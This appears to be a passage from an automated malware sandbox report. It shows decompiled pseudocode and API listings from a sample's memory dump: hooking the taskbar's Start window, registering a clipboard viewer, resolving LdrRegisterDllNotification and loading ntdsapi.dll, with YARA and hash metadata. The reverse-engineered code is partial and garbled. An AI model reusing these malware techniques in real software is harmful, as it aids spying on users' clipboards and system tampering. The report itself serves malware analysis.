                                          				intOrPtr _t83;
                                          				signed int _t84;
                                          				signed int _t85;
                                          				signed int _t86;
                                          				intOrPtr _t90;
                                          				void* _t101;
                                          				intOrPtr* _t104;
                                          				void* _t129;
                                          				void* _t132;
                                          				void* _t134;
                                          				void* _t135;
                                          				void* _t145;
                                          				void* _t148;
                                          				void* _t152;
                                          
                                          				_t140 = __r9;
                                          				_t126 = __rdi;
                                          				_t102 = __rbx;
                                          				_t101 = _t134;
                                          				 *((long long*)(_t101 + 8)) = __rbx;
                                          				 *((long long*)(_t101 + 0x10)) = __rsi;
                                          				 *((long long*)(_t101 + 0x20)) = __rdi;
                                          				 *((long long*)(_t101 + 0x18)) = __r8;
                                          				_t132 = _t101 - 0x57;
                                          				_t135 = _t134 - 0x100;
                                          				_t153 = __rcx + 0x88;
                                          				_t148 = __rcx;
                                          				_t90 = 0;
                                          				_t145 = __r9;
                                          				_t129 = __rdx;
                                          				r14d = 0;
                                          				if(E00C7C050(_t101, __rbx, __rcx + 0x88, __rdx, __rdx, _t152) == 0 || E00C7C134(_t102, _t129) == 0) {
                                          					L6:
                                          					_t56 = 0;
                                          					goto L7;
                                          				} else {
                                          					 *((intOrPtr*)(_t135 + 0x30)) = 0x3c;
                                          					GetWindowInfo(??, ??);
                                          					if(( *(_t132 - 0x7d) & 0x0000000f) != 7 || E00C7B9E4() != 0x3daaa90b) {
                                          						_t104 =  *((intOrPtr*)(_t132 + 0x7f));
                                          						__eflags =  *(_t135 + 0x3c) -  *_t104;
                                          						if( *(_t135 + 0x3c) <=  *_t104) {
                                          							goto L6;
                                          						}
                                          						__eflags =  *(_t135 + 0x34) -  *(_t104 + 8);
                                          						if( *(_t135 + 0x34) >=  *(_t104 + 8)) {
                                          							goto L6;
                                          						}
                                          						__eflags =  *(_t135 + 0x40) -  *((intOrPtr*)(_t104 + 4));
                                          						if( *(_t135 + 0x40) <=  *((intOrPtr*)(_t104 + 4))) {
                                          							goto L6;
                                          						}
                                          						__eflags =  *(_t135 + 0x38) -  *((intOrPtr*)(_t104 + 0xc));
                                          						if( *(_t135 + 0x38) >=  *((intOrPtr*)(_t104 + 0xc))) {
                                          							goto L6;
                                          						}
                                          						_t65 = E00C6ADD8();
                                          						__eflags = _t65 - 5;
                                          						if(_t65 <= 5) {
                                          							L16:
                                          							asm("movups xmm0, [esp+0x34]");
                                          							asm("movdqu [ebp-0x61], xmm0");
                                          							_t66 = E00C7BB64(_t101, _t104, _t153, _t129, _t140);
                                          							r15d = _t66;
                                          							__imp__GetClassLongPtrA();
                                          							__eflags = _t66 & 0x000000c0;
                                          							if((_t66 & 0x000000c0) != 0) {
                                          								L20:
                                          								 *((intOrPtr*)(_t135 + 0x20)) = 1;
                                          								E00C7C8D8(_t104, _t148, _t129, _t126, _t129, _t145, _t132 - 0x61);
                                          								L21:
                                          								_t83 =  *((intOrPtr*)(_t104 + 0xc));
                                          								__eflags =  *(_t135 + 0x40) - _t83;
                                          								if( *(_t135 + 0x40) > _t83) {
                                          									_t85 = _t83 + 0xfffffffe;
                                          									 *(_t135 + 0x40) = _t85;
                                          									__eflags =  *((intOrPtr*)(_t104 + 0x18)) - _t90;
                                          									if( *((intOrPtr*)(_t104 + 0x18)) != _t90) {
                                          										_t86 = _t85 +  *((intOrPtr*)(_t104 + 0x20)) -  *((intOrPtr*)(_t104 + 0x28));
                                          										__eflags = _t86;
                                          										 *(_t135 + 0x40) = _t86;
                                          									}
                                          								}
                                          								_t68 =  *((intOrPtr*)(_t104 + 4));
                                          								__eflags =  *(_t135 + 0x38) - _t68;
                                          								if( *(_t135 + 0x38) < _t68) {
                                          									r14d = _t68;
                                          									r14d = r14d -  *(_t135 + 0x38);
                                          									r14d = r14d + 2;
                                          									_t74 = _t68 + 2;
                                          									__eflags = _t74;
                                          									 *(_t135 + 0x38) = _t74;
                                          								}
                                          								_t84 =  *(_t104 + 8);
                                          								__eflags =  *(_t135 + 0x3c) - _t84;
                                          								if( *(_t135 + 0x3c) > _t84) {
                                          									_t84 = _t84 + 0xfffffffe;
                                          									 *(_t135 + 0x3c) = _t84;
                                          									__eflags =  *((intOrPtr*)(_t104 + 0x18)) - _t90;
                                          									if( *((intOrPtr*)(_t104 + 0x18)) != _t90) {
                                          										_t84 = _t84 +  *((intOrPtr*)(_t104 + 0x2c)) -  *((intOrPtr*)(_t104 + 0x34));
                                          										__eflags = _t84;
                                          										 *(_t135 + 0x3c) = _t84;
                                          									}
                                          								}
                                          								_t69 =  *_t104;
                                          								__eflags =  *(_t135 + 0x34) - _t69;
                                          								if( *(_t135 + 0x34) < _t69) {
                                          									_t90 = _t69 -  *(_t135 + 0x34) + 2;
                                          									_t71 = _t69 + 2;
                                          									__eflags = _t71;
                                          									 *(_t135 + 0x34) = _t71;
                                          								}
                                          								asm("movups xmm0, [esp+0x34]");
                                          								 *((intOrPtr*)(_t135 + 0x28)) = r14d;
                                          								 *((intOrPtr*)(_t135 + 0x20)) = _t90;
                                          								asm("movdqu [ebp-0x61], xmm0");
                                          								E00C7CC38(_t84, 0xffffffe6,  *((intOrPtr*)(_t132 + 0x6f)), _t145, _t132 - 0x61);
                                          								goto L8;
                                          							}
                                          							__eflags = r15d & 0x00006040;
                                          							if((r15d & 0x00006040) != 0) {
                                          								goto L20;
                                          							}
                                          							r8d = 0;
                                          							_t77 = E00C7D384(_t104, _t129, _t145, _t126, _t129, _t132);
                                          							__eflags = _t77;
                                          							if(_t77 != 0) {
                                          								goto L21;
                                          							}
                                          							goto L6;
                                          						}
                                          						__eflags =  *((intOrPtr*)(_t104 + 0x58)) - _t90;
                                          						if( *((intOrPtr*)(_t104 + 0x58)) != _t90) {
                                          							goto L16;
                                          						}
                                          						E00C7BB64(_t101, _t104, _t153, _t129, _t140);
                                          						asm("bt eax, 0xf");
                                          						if(__eflags >= 0) {
                                          							goto L8;
                                          						}
                                          						goto L16;
                                          					} else {
                                          						r8d = 0x80;
                                          						if(GetWindowTextA(??, ??, ??) != 0) {
                                          							L8:
                                          							_t56 = 1;
                                          							L7:
                                          							return _t56;
                                          						} else {
                                          							ShowWindow();
                                          							goto L6;
                                          						}
                                          					}
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                            • Part of subcall function 00C7C134: IsWindowVisible.USER32 ref: 00C7C141
                                            • Part of subcall function 00C7C134: GetWindowLongPtrA.USER32 ref: 00C7C153
                                          • GetWindowInfo.USER32 ref: 00C7CA80
                                            • Part of subcall function 00C7B9E4: GetClassNameA.USER32 ref: 00C7B9F6
                                          • GetWindowTextA.USER32 ref: 00C7CAAC
                                          • ShowWindow.USER32 ref: 00C7CABB
                                          • GetClassLongPtrA.USER32 ref: 00C7CB52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$ClassLong$AncestorInfoNameShowTextVisible
                                          • String ID: <
                                          • API String ID: 2975856901-4251816714
                                          • Opcode ID: 9b82b624594f61a8366c54947085650309c2348102d45d5ce46adddef32f2801
                                          • Instruction ID: 0bc2cb3092c345e7102713fa601284d934539b11716550311a8ea685605f3240
                                          • Opcode Fuzzy Hash: 9b82b624594f61a8366c54947085650309c2348102d45d5ce46adddef32f2801
                                          • Instruction Fuzzy Hash: 6151C073A14641CBD720CF3AD48166E77A1F394F98F54912AFE5A87B08DB38C942DB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,00C6249C,?,?,00000008,00C633D0,?,?,00000000,00C63286), ref: 00C622BE
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00C6249C,?,?,00000008,00C633D0,?,?,00000000,00C63286), ref: 00C62365
                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00C6249C,?,?,00000008,00C633D0,?,?,00000000,00C63286), ref: 00C62373
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Library$FreeHandleLoadModule
                                          • String ID: NTDLL.DLL$ntdsapi.dll
                                          • API String ID: 2140536961-4180381668
                                          • Opcode ID: aef9b25d979f61c625d5f6bad82629806db19e43df282c582d9b0431258ab30d
                                          • Instruction ID: ebb21f5b6d586207b4868e4b80757adf109f916d9f8b6aa723e59467a6d7d288
                                          • Opcode Fuzzy Hash: aef9b25d979f61c625d5f6bad82629806db19e43df282c582d9b0431258ab30d
                                          • Instruction Fuzzy Hash: 99316932A01F408AEF108F65E8803AD33A8F748BA8F444626DF5D13BA8EF38C555C350
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 20%
                                          			E00C6242C(long long __rax, long long __rbx, long long __rcx, long long __rdx, long long __rsi, long long __rbp, long long* __r8, long long _a8, long long _a16, long long _a24) {
                                          				void* __rdi;
                                          				void* _t19;
                                          				long long* _t29;
                                          				long long _t33;
                                          
                                          				_t25 = __rax;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t36 = __r8;
                                          				_t38 = __rdx;
                                          				_t41 = __rcx;
                                          				_t19 = 1;
                                          				if(GetVersion() < 6) {
                                          					if( *0xc95668 != 0) {
                                          						L6:
                                          						E00C61E70();
                                          						if(_t25 == 0) {
                                          							_t19 = 8;
                                          						} else {
                                          							 *((long long*)(_t25 + 8)) = _t25;
                                          							 *_t25 = _t25;
                                          							 *((long long*)(_t25 + 0x10)) = _t41;
                                          							 *((long long*)(_t25 + 0x18)) = _t38;
                                          							 *_t36 = _t25;
                                          							_t33 =  *0xc95668; // 0x0
                                          							_t29 =  *((intOrPtr*)(_t33 + 8));
                                          							 *_t25 = _t33;
                                          							 *((long long*)(_t25 + 8)) = _t29;
                                          							 *_t29 = _t25;
                                          							 *((long long*)(_t33 + 8)) = _t25;
                                          							goto L8;
                                          						}
                                          					} else {
                                          						E00C622A0(__rax, __rbx, __r8, __rdx);
                                          						 *0xc95668 = _t25;
                                          						if(_t25 != 0) {
                                          							goto L6;
                                          						}
                                          					}
                                          				} else {
                                          					GetModuleHandleW();
                                          					GetProcAddress(??, ??);
                                          					if(__rax != 0 &&  *((long long*)(__rax))() == 0) {
                                          						L8:
                                          						_t19 = 0;
                                          					}
                                          				}
                                          				return _t19;
                                          			}

                                          APIs
                                          • GetVersion.KERNEL32(?,?,00000008,00C633D0,?,?,00000000,00C63286,?,?,?,?,?,00C618B2), ref: 00C6244E
                                          • GetModuleHandleW.KERNEL32(?,?,00000008,00C633D0,?,?,00000000,00C63286,?,?,?,?,?,00C618B2), ref: 00C6245F
                                          • GetProcAddress.KERNEL32(?,?,00000008,00C633D0,?,?,00000000,00C63286,?,?,?,?,?,00C618B2), ref: 00C6246F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProcVersion
                                          • String ID: LdrRegisterDllNotification$NTDLL.DLL
                                          • API String ID: 3310240892-3368964806
                                          • Opcode ID: 0d326aa8212704a4f0072a2ca969c150ffa01dbd65b75f1a0928636b431914b6
                                          • Instruction ID: 94f50c0a2bd9befc8134c1cd68cd728f0dd139c55ff3172abc03ea55d7ff5039
                                          • Opcode Fuzzy Hash: 0d326aa8212704a4f0072a2ca969c150ffa01dbd65b75f1a0928636b431914b6
                                          • Instruction Fuzzy Hash: 4F21F931216F4085FB659F55FCD472976A4FB88B80F98C129EA8D43B65EF38C9A6C300
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00C6582C), ref: 00C77D52
                                          • HeapAlloc.KERNEL32(?,?,?,00C6582C), ref: 00C77D72
                                          • SetLastError.KERNEL32(?,?,?,00C6582C), ref: 00C77D83
                                          • wsprintfW.USER32 ref: 00C77D9D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocErrorHeapLastlstrlenwsprintf
                                          • String ID: %S_%s
                                          • API String ID: 2242173294-1352953545
                                          • Opcode ID: 758b194c8c9125576135f9e4416707bc239b554ab598bbe79c3c37455ff30f9f
                                          • Instruction ID: bc5aadd2fcc3e4de33e3f4eb5d6a527b2b467b78ac23dce89c8d604886c71a54
                                          • Opcode Fuzzy Hash: 758b194c8c9125576135f9e4416707bc239b554ab598bbe79c3c37455ff30f9f
                                          • Instruction Fuzzy Hash: 8101C4A5715B8086EF24CB13F804B597361FB98FD0F48C1319E0A07B24EE39C585C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			E00C7B290(void* __edx, long long __rax, long long __rbx, void* __rcx, void* __r8, long long _a8) {
                                          				long long _t17;
                                          				void* _t25;
                                          				void* _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          
                                          				_t31 = __r8;
                                          				_t20 = __rcx;
                                          				_t18 = __rbx;
                                          				_t17 = __rax;
                                          				_a8 = __rbx;
                                          				_t25 = __rcx;
                                          				while(1) {
                                          					r8d = 0;
                                          					E00C7B940(_t17, _t18, _t20, "Shell_TrayWnd", _t26, _t27, _t31);
                                          					_t18 = _t17;
                                          					if(_t17 != 0) {
                                          						break;
                                          					}
                                          					if( *((intOrPtr*)(_t25 + 0x224)) != 0) {
                                          						goto L7;
                                          					} else {
                                          						Sleep();
                                          						continue;
                                          					}
                                          					while(1) {
                                          						L7:
                                          						r8d = 0;
                                          						E00C7B940(_t17, _t18, _t18, "Start", _t26, _t27, _t31);
                                          						if(_t17 != 0) {
                                          							break;
                                          						}
                                          						if( *((intOrPtr*)(_t25 + 0x224)) == 0) {
                                          							Sleep();
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					__imp__SetWindowLongPtrA();
                                          					 *0xc95868 = _t17;
                                          					return 0;
                                          					goto L7;
                                          				}
                                          				goto L7;
                                          			}

                                          APIs
                                            • Part of subcall function 00C7B940: FindWindowExA.USER32 ref: 00C7B986
                                          • Sleep.KERNEL32 ref: 00C7B2AD
                                          • Sleep.KERNEL32 ref: 00C7B2DC
                                          • SetWindowLongPtrA.USER32 ref: 00C7B308
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: SleepWindow$FindLong
                                          • String ID: Shell_TrayWnd$Start
                                          • API String ID: 1352427482-2327449929
                                          • Opcode ID: 747d2496986b78d46f8b372cd796eb1e63c21de13470e842e6053b739d67fcf5
                                          • Instruction ID: de8a8f2bfe82bfd8914eedcb5be4d69fb0623d0e1fbb8d6a9fd88fa3cb18fc40
                                          • Opcode Fuzzy Hash: 747d2496986b78d46f8b372cd796eb1e63c21de13470e842e6053b739d67fcf5
                                          • Instruction Fuzzy Hash: 2501D12130374592FF286BA2F41876A23A0EB08750F94D229AA2E067A5EF3CC894C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenA.KERNEL32(?,?,?,00C6180D,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C64FC0
                                          • lstrcpyA.KERNEL32(?,?,?,00C6180D,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C64FDC
                                          • StrRChrA.SHLWAPI(?,?,?,00C6180D,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C64FEB
                                          • lstrcatA.KERNEL32(?,?,?,00C6180D,?,?,?,00C61F7A,?,?,?,00C6203D), ref: 00C65018
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcatlstrcpylstrlen
                                          • String ID: .dll
                                          • API String ID: 3050337572-2738580789
                                          • Opcode ID: 30c8a72433948d15194de40ff46092b7d00467e666fc6ad453ebacbd6cb0bf76
                                          • Instruction ID: 939fe1550c0d38945c0320a7cc88e8f0eec8ba13aa031cfb470d907c0ad3b25e
                                          • Opcode Fuzzy Hash: 30c8a72433948d15194de40ff46092b7d00467e666fc6ad453ebacbd6cb0bf76
                                          • Instruction Fuzzy Hash: 8301D651701A4181FF358F56D88572D6260AF48BA0F98C334C92A03BE0EE7CC849C345
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E01
                                          • CreateWindowExA.USER32 ref: 00C83E3D
                                          • SetClipboardViewer.USER32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E52
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C83966), ref: 00C83E61
                                          Strings
                                          • {FB43697C-B6AB-5C0E-7015-A419220F76B3}, xrefs: 00C83E0C
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ClipboardCreateErrorHandleLastModuleViewerWindow
                                          • String ID: {FB43697C-B6AB-5C0E-7015-A419220F76B3}
                                          • API String ID: 123401665-2817704424
                                          • Opcode ID: 95b70290efa8716d8227e3029f705f588282c281fd8775958b350c6d828a669a
                                          • Instruction ID: de04a214d09e608fdfaabcf53501513b60e02afa9f497ca88647077f909ee5d2
                                          • Opcode Fuzzy Hash: 95b70290efa8716d8227e3029f705f588282c281fd8775958b350c6d828a669a
                                          • Instruction Fuzzy Hash: 24012C32609B8487E764CF68F48475AB7E0F748B90F548629EB8983F14EF78C554CB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00C839F7
                                          • GetTickCount.KERNEL32 ref: 00C839FC
                                            • Part of subcall function 00C77DBC: wsprintfA.USER32 ref: 00C77E0C
                                          • GetModuleHandleA.KERNEL32 ref: 00C83A31
                                          • RegisterClassA.USER32 ref: 00C83A53
                                          Strings
                                          • {FB43697C-B6AB-5C0E-7015-A419220F76B3}, xrefs: 00C83A02
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCountHandleModuleRegisterTickmemsetwsprintf
                                          • String ID: {FB43697C-B6AB-5C0E-7015-A419220F76B3}
                                          • API String ID: 2277763089-2817704424
                                          • Opcode ID: 05fd34822b9b8c801c483925a43b4fb8f34636bd15353b0851566908594a0575
                                          • Instruction ID: 6b2ed4c74a30eaf722f3b84110f9d51f54e99fff25fd2e424b9033d46d24b465
                                          • Opcode Fuzzy Hash: 05fd34822b9b8c801c483925a43b4fb8f34636bd15353b0851566908594a0575
                                          • Instruction Fuzzy Hash: BF016932E20B90DEF700CBB0E8493EC33B1F754B69F908219DA5966D58DFB48159CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetVersion.KERNEL32(?,?,00C95A70,00C62ABC,?,?,?,00C62832,?,?,?,?,00C62147), ref: 00C623C6
                                          • GetModuleHandleW.KERNEL32(?,?,00C95A70,00C62ABC,?,?,?,00C62832,?,?,?,?,00C62147), ref: 00C623D7
                                          • GetProcAddress.KERNEL32(?,?,00C95A70,00C62ABC,?,?,?,00C62832,?,?,?,?,00C62147), ref: 00C623E7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProcVersion
                                          • String ID: LdrUnregisterDllNotification$NTDLL.DLL
                                          • API String ID: 3310240892-3940208311
                                          • Opcode ID: 83540ccd0aabb7a3334d0ef949b9cd8126c0618dca8ade917d81b5ca2d94c060
                                          • Instruction ID: 8f6150dad468d8d912156cc72d98eedd72b53914fc55d1f02ff20a50a3888887
                                          • Opcode Fuzzy Hash: 83540ccd0aabb7a3334d0ef949b9cd8126c0618dca8ade917d81b5ca2d94c060
                                          • Instruction Fuzzy Hash: 5EF03721216A0081EA649B5AF9D87787361FB88B80F988135DF5E43B64DF38C99AD304
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 28%
                                          			E00C7FA64(void* __ecx, void* __edx, long long __rax, void* __rsi, void* __r8, void* __r9) {
                                          				void* __rbx;
                                          				void* _t5;
                                          				void* _t11;
                                          				void* _t16;
                                          				void* _t22;
                                          
                                          				InitializeCriticalSection();
                                          				GetModuleHandleA(??);
                                          				GetProcAddress(??, ??);
                                          				 *0xc95870 = __rax;
                                          				if(__rax != 0) {
                                          					E00C82E70(__rax);
                                          					E00C7EE38(__rax);
                                          					_t5 = E00C7D4E4();
                                          					_t11 = _t5;
                                          					__eflags = _t5;
                                          					if(_t5 == 0) {
                                          						E00C6AEE8();
                                          						E00C81A58(_t16, __rsi, _t22);
                                          						E00C83A68(__eflags);
                                          					}
                                          					return _t11;
                                          				}
                                          				return 0x7f;
                                           			}

                                           Per-statement address column of the decompiled E00C7FA64 listing, collapsed: 0x00c7fa71 .. 0x00c7facb (0x00000000 entries omitted).

                                          APIs
                                          • InitializeCriticalSection.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA71
                                          • GetModuleHandleA.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA7E
                                          • GetProcAddress.KERNEL32(?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C7FA8E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCriticalHandleInitializeModuleProcSection
                                          • String ID: MessageBoxTimeoutA$user32
                                          • API String ID: 1068892330-2395250267
                                          • Opcode ID: f4914c7cb64e92ce1779adec732baa1abc33016436d9845602781cd254d53612
                                          • Instruction ID: 0413953441b02d21f06ac93bd7f1592946bd9dc4a5554de1376bf044975be62a
                                          • Opcode Fuzzy Hash: f4914c7cb64e92ce1779adec732baa1abc33016436d9845602781cd254d53612
                                          • Instruction Fuzzy Hash: 85F03020311A4192FB25B7B9E89AB6822A4AF54B15F848235D85D45261FF3CC94EE32D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Parent$ClassNamelstrcmpi
                                          • String ID: mdiclient
                                          • API String ID: 132458742-1999401180
                                          • Opcode ID: 3809e4410b39539c8eed4bc6d2d42539ba30a7a0597496520ae44efb6feb224f
                                          • Instruction ID: 902a0310c3417519826532aef54de260ae3ef44aea2b9b2d53dd994c9ef68c51
                                          • Opcode Fuzzy Hash: 3809e4410b39539c8eed4bc6d2d42539ba30a7a0597496520ae44efb6feb224f
                                          • Instruction Fuzzy Hash: DFF03019351B0681FE24CBA5EC24B7A5350AB44F84F888230DD1E47B65FF2CCA4D9B04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CreateEventlstrcpy
                                          • String ID: OPR
                                          • API String ID: 3695347688-3143204451
                                          • Opcode ID: 048a184f1b226564831854f818157a5b2e6abb968dc0fa53d1ec01474f01824e
                                          • Instruction ID: 762f9538a4dffa38d46748668c9f7a0f6cb2ec435450b96065c655c991ad6cd1
                                          • Opcode Fuzzy Hash: 048a184f1b226564831854f818157a5b2e6abb968dc0fa53d1ec01474f01824e
                                          • Instruction Fuzzy Hash: BBF05EB231090A93FF248B24E854B9A2321FB48748F808227954E46974DF3CC24DC744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CreateEventlstrcpy
                                          • String ID: OPRN
                                          • API String ID: 3695347688-2540104326
                                          • Opcode ID: f2ba9ebc16eeb97837ca9502fc3c736bc2b613562156cdf60fef05bac08a86cc
                                          • Instruction ID: d6bd50a477afd74035d05a3d12f0b594e2afabcd733344de8a7a33cffda36f84
                                          • Opcode Fuzzy Hash: f2ba9ebc16eeb97837ca9502fc3c736bc2b613562156cdf60fef05bac08a86cc
                                          • Instruction Fuzzy Hash: DAF05EB231090A93FF348B24E854B9A2321FB48748F808223954E46964DF3CC24DC744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

